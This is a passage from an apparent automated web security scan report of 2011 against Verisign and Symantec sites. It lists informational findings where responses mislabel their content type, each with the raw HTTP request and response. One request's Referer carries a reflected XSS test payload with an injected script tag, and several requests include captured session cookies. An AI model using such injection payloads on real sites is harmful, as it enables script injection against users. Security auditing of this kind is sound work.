GET /geoipAPI.js?src=ii3&ts=1315621724 HTTP/1.1 Host: gs.instantservice.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 355 Connection: closeContent-Type: text/javascript; charset=utf-8 isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are...[SNIP]...
23.27. https://idprotect.verisign.com/common/scripts/dlText.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/common/scripts/dlText.js
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript The response states that it contains script . However, it actually appears to contain HTML .
Request
GET /common/scripts/dlText.js HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:57 GMT Accept-Ranges: bytes ETag: W/"19229-1310089722000" Last-Modified: Fri, 08 Jul 2011 01:48:42 GMTContent-Type: text/javascript Content-Length: 19229 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive linkData['DL_0'] = 'Supported Mobile Devices'; linkData['DL_1'] = 'Select Your Mobile Device'; linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname; linkData...[SNIP]...
23.28. https://idprotect.verisign.com/imageapp.v
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/imageapp.v
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /imageapp.v?Image=tmobile_de HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:51:34 GMT Content-Disposition: filename=getimage.jpegContent-Type: image/jpeg Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 491 GIF89a..2........................................o.._..`..P..@..?..0.. z..q..g..............................!.......,......2.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.......n..m.:.v...[SNIP]...
23.29. https://idprotect.verisign.com/membersites.v
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/membersites.v
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain JSON .
Request
GET /membersites.v?DATA={REGION:ALL,CATEGORY:FEATURED_ONLY,ACCOUNT_TYPE:ALL} HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:53 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 7124 Keep-Alive: timeout=15, max=100 Connection: Keep-AliveContent-Type: text/plain [{"id":27323,"logoImage":null,"isPartner":0,"description":"Merrill Lynch","isFeatured":1,"name":"merrilllynch","hasImageLogo":1,"displayOrder":1,"webLink":"http://www.ml.com/","code":"merrilllynch","b...[SNIP]...
23.30. https://knowledge.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://knowledge.verisign.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "342ce-47e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1150 Keep-Alive: timeout=15 Connection: Keep-AliveContent-Type: text/plain ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript The response states that it contains script . However, it actually appears to contain plain text .
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisignContent-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
23.32. http://partnerlocator.symantec.com/public/product_finder
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://partnerlocator.symantec.com
Path:
/public/product_finder
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain XML .
Request
GET /public/product_finder HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:45:58 GMTContent-Type: text/html Connection: close Content-Length: 34 <h1>500 Internal Server Error</h1>
23.33. http://partnerlocator.symantec.com/public/pulldown_list
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://partnerlocator.symantec.com
Path:
/public/pulldown_list
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain plain text .
Request
GET /public/pulldown_list;plist=country;search_term=usa;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search X-Prototype-Version: 1.5.0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:48 GMTContent-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Size: 20 Content-Length: 20 No Matching Partners
23.34. http://player.ooyala.com/info/primary/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://player.ooyala.com
Path:
/info/primary/
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain plain text .
Request
GET /info/primary/ HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OKContent-Type: text/html Content-Length: 381 Date: Fri, 09 Sep 2011 21:25:47 GMT Connection: close Vary: Accept-Encoding LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ...[SNIP]...
23.35. http://player.ooyala.com/sas/authorized
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://player.ooyala.com
Path:
/sas/authorized
Issue detail
The response contains the following Content-type statement:The response states that it contains XML . However, it actually appears to contain script .
Request
GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG×tamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Status: 200 OKContent-Type: text/xml Content-Length: 716 Cache-Control: public, no-cache Date: Fri, 09 Sep 2011 21:26:08 GMT Connection: close iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9 kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO JotiY/UdyOFK+TiH1...[SNIP]...
23.36. http://query.verisign.com/cluster
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://query.verisign.com
Path:
/cluster
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript; charset=utf-8 The response states that it contains script . However, it actually appears to contain unrecognised content .
Request
POST /cluster?coutput=json&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108&access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1 HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend Content-Length: 0 Origin: http://query.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMTContent-Type: text/javascript; charset=utf-8 Cache-Control: max-age=900 Expires: Fri, 09 Sep 2011 21:41:10 GMT Content-Length: 3685 {"clusters": [ ], "documents": [ { "url": "https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR", "title": "Ve...[SNIP]...
23.37. http://sales.liveperson.net/hcp/html/mTag.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://sales.liveperson.net
Path:
/hcp/html/mTag.js
Issue detail
The response contains the following Content-type statement:Content-Type: application/x-javascript The response states that it contains script . However, it actually appears to contain unrecognised content .
Request
GET /hcp/html/mTag.js?site=71097838 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934
Response
HTTP/1.1 200 OK Content-Length: 17291Content-Type: application/x-javascript Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838 Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:1efe" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:26:51 GMT eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][...[SNIP]...
23.38. https://seal.verisign.com/getseal
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://seal.verisign.com
Path:
/getseal
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript The response states that it contains script . However, it actually appears to contain plain text .
Request
GET /getseal HTTP/1.1 Host: seal.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, must-revalidate ETag: Content-Type: text/javascript Date: Fri, 09 Sep 2011 21:46:24 GMT Connection: close <!-- x=1; -->
23.39. http://sr2.liveperson.net/hcp/html/mTag.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://sr2.liveperson.net
Path:
/hcp/html/mTag.js
Issue detail
The response contains the following Content-type statement:Content-Type: application/x-javascript The response states that it contains script . However, it actually appears to contain unrecognised content .
Request
GET /hcp/html/mTag.js?site=71097838 HTTP/1.1 Host: sr2.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678
Response
HTTP/1.1 200 OKContent-Type: application/x-javascript Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838 Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:27d6" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 17291 Date: Fri, 09 Sep 2011 21:31:14 GMT Connection: close eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][...[SNIP]...
23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT ETag: "a680e3-47e-491d5c7eb70c0"Content-Type: text/plain; charset=UTF-8 X-Varnish: 312037258 Vary: Accept-Encoding Content-Length: 1150 Cache-Control: max-age=18988 Date: Fri, 09 Sep 2011 21:34:12 GMT Connection: close ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.41. http://www.symantec.com/s/searchg/suggest
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.symantec.com
Path:
/s/searchg/suggest
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=utf-8 The response states that it contains plain text . However, it actually appears to contain JSON .
Request
GET /s/searchg/suggest?q=xss&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OKContent-Type: text/plain; charset=utf-8 Content-Length: 81 Expires: Fri, 09 Sep 2011 21:33:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:33:41 GMT Connection: close Vary: Accept-Encoding { "query":"xss", "results": [ {"name":"xss-vulnerabilities", "type":"suggest"}] }
23.42. http://www.symantec.com/search/searchjs.jsp
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.symantec.com
Path:
/search/searchjs.jsp
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /search/searchjs.jsp?lg=en&ct=us&sg=business HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 6094 Cache-Control: public, max-age=3548 Date: Fri, 09 Sep 2011 21:33:39 GMT Connection: close var omniture_region = "NAM"; var omniture_country = "us"; var omniture_language = "en"; var more_results = "More results from"; var site_name = "Symantec.com"; var breadcrumb_search_title = "Search...[SNIP]...
23.43. http://www.verisign.ch/assets/global/js/leftnav.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.ch
Path:
/assets/global/js/leftnav.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /assets/global/js/leftnav.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.ch
Path:
/assets/shared/js/jquery.url.packed.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
